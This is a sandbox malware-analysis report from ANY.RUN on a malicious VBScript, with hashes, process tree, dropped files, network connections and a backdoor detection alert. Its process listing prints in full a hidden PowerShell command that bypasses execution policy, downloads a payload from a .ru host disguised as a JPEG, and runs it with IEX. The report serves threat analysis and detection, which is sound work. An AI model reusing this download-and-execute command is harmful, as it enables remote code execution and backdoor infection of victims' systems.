analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

System[1].vbs

Full analysis: https://app.any.run/tasks/0fdcb242-ccc9-405d-a4af-40c74f2a8eb5
Verdict: Malicious activity
Analysis date: November 15, 2018, 21:48:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

F041A09CACD3499C446638071872D731

SHA1:

7B41FFA6EA5ED2F91899327D56B319884587B79D

SHA256:

17368E8DC968F7718848F66324FB3B793D43480483960AF2455D99015CB10F9F

SSDEEP:

12:eufxXfERqdHhFSwi980Qpcn96bmH+udAuZB64RDW0Y7xFCJWjBh8WGW7TZ:eu5P4uHHi/6U+uU4q7xmWAWGW71

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 1668)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2596)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 3048)
    • Connects to unusual port

      • powershell.exe (PID: 2596)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3048"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\System[1].vbs"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
1668"C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('http://ghost246630.worldhosts.ru/csgo.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrackC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2596powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('http://ghost246630.worldhosts.ru/csgo.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrackC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
351
Read events
280
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2596powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\83Z0F64BUXDRTLP8ZRBZ.temp
MD5:
SHA256:
2596powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:43B01A05BB940A9D5D0BE924AB203E0A
SHA256:B9E77DF43925FFAABEEDF95F08B40DD80A8E633D77929AB4F6AD45146332304B
2596powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF109230.TMPbinary
MD5:43B01A05BB940A9D5D0BE924AB203E0A
SHA256:B9E77DF43925FFAABEEDF95F08B40DD80A8E633D77929AB4F6AD45146332304B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
4
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2596
powershell.exe
GET
200
5.196.149.90:80
http://ghost246630.worldhosts.ru/csgo.jpg
FR
text
46.0 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2596
powershell.exe
5.196.149.90:80
ghost246630.worldhosts.ru
OVH SAS
FR
malicious
2596
powershell.exe
185.86.1.223:5551
Everest Broadcasting Company Ltd
UA
malicious

DNS requests

Domain
IP
Reputation
ghost246630.worldhosts.ru
  • 5.196.149.90
malicious

Threats

PID
Process
Class
Message
2596
powershell.exe
A Network Trojan was detected
SC BACKDOOR backdoor receiving config via image file (02/18)
No debug info